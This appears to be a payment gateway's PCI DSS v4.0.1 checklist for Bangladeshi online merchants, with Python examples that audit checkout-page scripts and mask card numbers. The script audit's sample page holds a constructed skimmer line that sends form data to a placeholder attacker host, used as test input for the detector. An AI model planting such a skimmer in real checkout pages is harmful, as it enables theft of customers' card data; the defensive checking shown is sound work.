PCI Compliance Audit Checklist for Merchants
If your business in Dhaka, Chittagong, Sylhet, Khulna, Rajshahi or anywhere in Bangladesh accepts Visa, Mastercard, American Express or any card payments — whether online, in-app or via payment links — PCI DSS compliance is one of the most important things you need to get right.
In 2026 Bangladesh Bank requires every licensed Payment Service Provider (PSP) and Payment System Operator (PSO) to maintain PCI DSS Level 1 standards. Even small online merchants face real risks if they ignore it:
- Your gateway can suddenly stop processing cards
- You can get hit with penalty fees from card brands
- Chargebacks go up quickly
- Customers lose trust and stop buying
This simple, step-by-step PCI DSS v4.0.1 checklist is made especially for Bangladeshi e-commerce stores, SaaS platforms, digital services and online sellers. Use it to check your current setup, prepare your SAQ, or work with an auditor.
What PCI DSS Really Means for Merchants in Bangladesh Right Now
PCI DSS (Payment Card Industry Data Security Standard) version 4.0.1 is the current global rule book for keeping cardholder information safe.
The biggest updates that affect you in 2026:
- Multi-factor authentication (MFA) required for all access into the cardholder data environment, not only remote or admin access
- An inventory of every script on payment pages, with integrity checks and tamper detection for the page itself (Requirements 6.4.3 and 11.6.1), aimed at the skimming attacks that target checkout
- A "customized approach" and targeted risk analyses, so you can justify how often you run certain controls from your own risk picture rather than one fixed schedule
- Stronger checks on third-party providers: your gateway must be compliant, and you must document which requirements it covers for you and which remain yours
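The script-inventory point above is the one most online merchants can actually automate. What follows is an added example, not code from this page or from any gateway: a small Python check that parses a checkout page, compares every script tag with a written inventory (approved external sources must be pinned with a Subresource Integrity hash; inline scripts are identified by their sha384 hash) and reports anything else. The page HTML, the inventory, the gateway hostname and the injected "skimmer" script are all constructed placeholders.

```python
"""Check the scripts on a checkout page against an approved inventory.

Added example for the "malicious scripts on checkout pages" item (PCI DSS
v4.0.1 Requirements 6.4.3 and 11.6.1). Not code from the page or any gateway.
Assumptions: the page HTML is fetched elsewhere and passed in as a string;
every hostname, hash and script body below is a constructed placeholder.
"""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(script_text: str) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    digest = hashlib.sha384(script_text.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


class _ScriptCollector(HTMLParser):
    """Collect every <script> on the page: src, integrity attribute, inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw text, possibly in chunks.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_checkout_page(html, approved_src, approved_inline):
    """Compare the page's scripts with the written inventory (Req 6.4.3).

    Returns one finding per script that is not approved, is approved but not
    pinned with an integrity attribute, or is inline with an unknown hash.
    Run it on a schedule against the page as a customer receives it and you
    also have the content-change detection Req 11.6.1 asks for.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"]:
            if s["src"] not in approved_src:
                findings.append(f"unapproved external script: {s['src']}")
            elif not s["integrity"]:
                findings.append(f"approved script without integrity attribute: {s['src']}")
        else:
            h = sri_hash(s["body"])
            if h not in approved_inline:
                findings.append(f"inline script not in inventory: {h}")
    return findings


# Constructed sample inventory: the hostname and the inline loader are placeholders.
INLINE_LOADER = "window.gatewayConfig = {merchant: 'demo-merchant'};"
APPROVED_SRC = {"https://checkout.example-gateway.test/v1/checkout.js"}
APPROVED_INLINE = {sri_hash(INLINE_LOADER)}

# Constructed checkout page: the third <script> plays the part of an injected
# skimmer that sends the form contents to an attacker-controlled placeholder host.
SAMPLE_PAGE = f"""<html><body>
<form id="pay"><input name="name"></form>
<script src="https://checkout.example-gateway.test/v1/checkout.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script>{INLINE_LOADER}</script>
<script>document.getElementById('pay').addEventListener('submit', e => navigator.sendBeacon('https://attacker.test/c', new FormData(e.target)))</script>
</body></html>"""


if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_PAGE, APPROVED_SRC, APPROVED_INLINE):
        print(finding)
```

Run against the constructed page, the check stays silent on the pinned gateway loader and the known inline snippet and reports only the injected third script. The inventory itself (why each script is there, who approved it) is the written record the requirement asks for; this script just keeps the live page honest against it.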
Your merchant level is set by each card brand from the number of that brand's transactions you process per year (your acquirer or gateway tells you which level applies to you):
- Level 4: fewer than 20,000 e-commerce transactions (or up to 1 million across all channels) → SAQ + quarterly ASV scans where applicable
- Level 3: 20,000 to 1 million e-commerce transactions → SAQ + quarterly ASV scans
- Level 2: 1 million to 6 million → SAQ (some brands require it to be completed by a certified assessor) or a full Report on Compliance
- Level 1: more than 6 million, or any merchant a brand decides to treat as Level 1 (for example after a breach) → annual on-site assessment by a Qualified Security Assessor (QSA)
Most Dhaka and nationwide SMEs fall into Level 4 or Level 3.
Easy-to-Follow PCI DSS Checklist (12 Main Requirements)
1. Build & Maintain a Secure Network
- Put firewalls (network security controls) in place, document every allowed rule with a business reason, and review the rule set at least every six months
- Separate the part of your system that handles card data from everything else; segmentation that is tested is what keeps the rest of your network out of scope
- Change all default passwords and settings on routers, firewalls and servers
2. Apply Secure Settings to Every System
- Turn off or remove anything unnecessary (services, accounts, ports, default applications)
- Harden servers, databases, POS machines and web servers against a documented standard (the CIS Benchmarks are a common choice)
- Keep one configuration standard per system type and check systems against it, rather than hardening each one by hand
3. Protect Any Card Data You Store
- Never store sensitive authentication data (CVV/CVC, full magnetic stripe or chip data, PIN) after authorization, even encrypted; store the full card number (PAN) only if you have a documented business need
- If you must store PAN, render it unreadable (strong encryption such as AES-128 or stronger, a keyed hash, or tokenization) and keep the keys separate from the data, with documented key management
- When showing card numbers, mask them: display at most the BIN and last 4 digits (first 6 and last 4 in the common case), and only to people whose job needs it
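To know whether PANs are leaking into places they should not be (application logs, support tickets, database exports) you need to be able to find them, and to mask them before they are written. The following is an added Python example, not code from this page or from any gateway: it finds candidate card numbers (13 to 19 digits, optional spaces or dashes) that pass the Luhn check, and masks them to the BIN and last four. The log line it runs on is constructed, using the standard Visa and Amex test numbers.

```python
"""Find and mask card numbers (PANs) in free text, e.g. before writing a log line.

Added example for the Requirement 3 items above; not code from the page or
from any gateway. Assumptions (not stated on the page): a PAN is 13 to 19
digits, may be written with single spaces or dashes, and passes Luhn.
"""
import re

# Candidate: 13-19 digits with optional single space/dash separators, not part
# of a longer digit run. The look-arounds stop a 20-digit run from matching.
_PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str, keep_prefix: int = 6) -> str:
    """Mask a PAN, showing at most the BIN (first 6) and the last 4 digits."""
    digits = re.sub(r"\D", "", pan)
    if not 13 <= len(digits) <= 19:
        raise ValueError("not a PAN length")
    prefix = min(keep_prefix, 6)    # never reveal more than the BIN
    return digits[:prefix] + "*" * (len(digits) - prefix - 4) + digits[-4:]


def find_pans(text: str) -> list[str]:
    """Return the digit-only PANs found in text that pass the Luhn check."""
    found = []
    for m in _PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


def redact(text: str) -> str:
    """Replace every Luhn-valid PAN in text with its masked form."""
    def _sub(m):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            return mask_pan(digits)
        return m.group()            # other digit runs (phone numbers, IDs) untouched
    return _PAN_CANDIDATE.sub(_sub, text)


if __name__ == "__main__":
    # Constructed log line: standard Visa and Amex test numbers plus a phone number.
    line = "order 42 paid with 4111 1111 1111 1111 and 378282246310005, phone +8801712345678"
    print(find_pans(line))
    print(redact(line))
```

Two caveats a practitioner should keep in mind: any 13 to 19 digit string has roughly a one in ten chance of passing Luhn, so a scan of logs or dumps will produce false positives that need a human look, and redacting at the logging layer is a stopgap. The real fix for an online merchant is the hosted checkout described later on this page, so the PAN never reaches your servers in the first place.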
4. Encrypt Card Data When It Travels
- Use TLS 1.3 (TLS 1.2 at a minimum) with strong cipher suites for every connection that carries card data over a public network
- Turn off SSL and early TLS (1.0 and 1.1) on web servers, load balancers and API endpoints, and confirm it with a scanner rather than trusting the config
- Never send PANs by email, chat or SMS; if a legacy process still does, the message itself must be encrypted (this should be very rare)
5. Protect Against Malware
- Run anti-malware on every in-scope system (if you judge a system not to be at risk, write that judgement down and revisit it periodically)
- Keep definitions and the engine updating automatically, and run scans on a schedule you have documented from your risk analysis (weekly is a common baseline; higher-risk systems more often)
6. Keep Systems & Software Secure
- Install critical and high-severity security patches within one month of release (that is the PCI DSS deadline); schedule the rest on a documented timeline
- Follow secure coding practices (the OWASP Top 10 is a reasonable reference for the flaw classes to cover: injection, broken access control and so on)
- Review custom code for security issues before it goes live, by someone other than the author or with automated tools, and fix what is found first
7. Control Who Can See Card Data
- Give access only to people who need it for their job, at the lowest privilege that works, with "deny all" as the default
- Review who has access every 6 months, document the review, and remove access the moment someone leaves or changes role
8. Identify & Authenticate Users
- Give every person a unique login ID; no shared or generic accounts on anything in scope
- Require multi-factor authentication (MFA) for all access into the cardholder data environment and for all remote access to your network; passwords must be at least 12 characters (8 only where a system cannot do more)
9. Limit Physical Access
- Lock server rooms and control who can enter
- For online-only businesses on cloud hosting, the data centre's physical security is the provider's responsibility (check it is covered in their compliance attestation); your own offices, laptops and any media that could hold card data still count
10. Log & Monitor Everything
- Turn on audit logging for every in-scope system: who did what, when, from where, and whether it succeeded; keep logs for at least 12 months, with the last 3 months available for immediate analysis
- Review logs daily for the systems that handle card data and for security events (automated alerting counts); review other logs on a schedule you have documented
11. Test Security Often
- Run external vulnerability scans every quarter through an Approved Scanning Vendor (ASV), and rescan until you get a passing report
- Run internal vulnerability scans at least every quarter and after any significant change; fix high and critical findings and rescan
- Do penetration testing (external and internal) at least once a year and after significant changes; if you rely on network segmentation to keep systems out of scope, test that the segmentation actually holds
12. Have Security Policies & Training
- Write and update a clear security policy
- Train all staff on card security when they join and at least once a year after that, and keep attendance records
- Check backgrounds of employees who handle card data or have access to the card data environment, within what local law allows
- Have written agreements with every service provider that touches card data (including your payment gateway) in which they acknowledge their responsibility for it; keep a list of these providers, a matrix of which requirements each covers for you, and check their compliance status at least once a year
Special Tips for Online Stores & SaaS Businesses in Bangladesh
- Use hosted/redirect checkout or the gateway's iframe (the customer enters card details on the gateway's page, not yours) → this keeps card data off your servers → you usually qualify for the shortest form, SAQ A; the page on your site that sends customers to the gateway is still in scope for a handful of requirements, including script and tamper checks
- Never keep full card numbers on your own system; if you need a reference for refunds or repeat billing, store the gateway's token instead
- Make sure your gateway is PCI DSS compliant and ask for its current Attestation of Compliance (Moneybag is Level 1 compliant)
- Turn on 3-D Secure (now branded Visa Secure and Mastercard Identity Check; the older "Verified by Visa" and "SecureCode" names are retired) for card transactions; this is fraud protection and chargeback liability shift, not a PCI DSS requirement
Frequently Asked Questions (Quick Answers)
Is PCI DSS mandatory for every small merchant in Bangladesh?
Not a direct law for tiny shops, but Bangladesh Bank requires it from all payment providers. Your gateway will usually force you to comply or stop card processing.
Which SAQ form should most Dhaka online stores use?
SAQ A if the card form is fully hosted by the gateway (redirect or iframe). SAQ A-EP if your own web page serves the form or runs script that sends card data directly to the gateway (direct post, JavaScript). SAQ D if you store, process or transmit card data on your own systems, or do not meet the eligibility criteria of any shorter SAQ.
How often do I have to run vulnerability scans?
Every quarter for external scans (by an Approved Scanning Vendor), plus internal scans at least quarterly and after any significant change (weekly is better for higher-risk systems).
If I use Moneybag, am I automatically PCI compliant?
It reduces your scope a lot (especially with hosted checkout), but you still need to fill out an SAQ, keep policies updated, run scans and train your team.
What happens if I don’t follow PCI rules?
Your gateway can block card payments, card brands can fine you (through the provider), chargebacks rise, and you risk problems under BB regulations.
Next Steps – Make Your Payments Secure Today
PCI DSS compliance protects your customers, your sales and your business in Bangladesh’s growing online economy.
The easiest way to lower your risk is to use a PCI DSS Level 1 compliant gateway that takes care of encryption, tokenization and fraud monitoring for you.
→ Try Moneybag Sandbox Free — test secure, compliant checkout flows without risk
→ Join as Merchant — get PCI DSS compliant processing + lowest promo rates
Not sure what your PCI scope looks like or which SAQ to use? Tell me your annual card transaction volume, how your checkout is built (hosted/redirect, iframe, direct post) and which platform you use (WooCommerce, Shopify, custom site, etc.), and I'll give you the exact next steps.
Stay compliant. Keep customers safe. Grow without worry — Dhaka merchants, secure your card payments today!